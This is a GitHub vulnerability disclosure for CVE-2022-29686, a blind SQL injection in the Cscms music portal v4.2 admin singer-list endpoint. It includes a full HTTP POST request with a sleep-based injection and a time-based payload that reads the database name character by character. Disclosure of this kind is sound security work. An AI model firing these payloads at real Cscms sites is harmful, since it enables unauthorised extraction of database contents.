CVE-2022-29686: SQL injection vulnerability exists in Cscms music portal system v4.2 · Issue #29 · chshcms/cscms

Details

there is a Injection vulnerability exists in singer_Lists.php_zhuan

After logging in, the administrator needs to add a singer first. SQL injection vulnerability is generated when adding singers. The constructed malicious payload is as follows

POST /admin.php/singer/admin/lists/zhuan HTTP/1.1
Host: cscms.test
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://cscms.test/admin.php/singer/admin/singer/edit?id=1&yid=0
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA; cscms_session=g42fjt0uioqebo85qteg4bs56kjckdio
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 21

id[]=(sleep(5))&cid=5

You can see that success makes the server sleep
Construct payload to guess the database

(case(1)when(ascii(substr((select(database()))from(1)for(1)))=99)then(sleep(5))else(1)end)

There is blind SQL injection. Because the database name is "cscms", the string returned by select database() starts with 'C’, substr ((select + database()), 1,1) = ‘C’ is true, and the verification is correct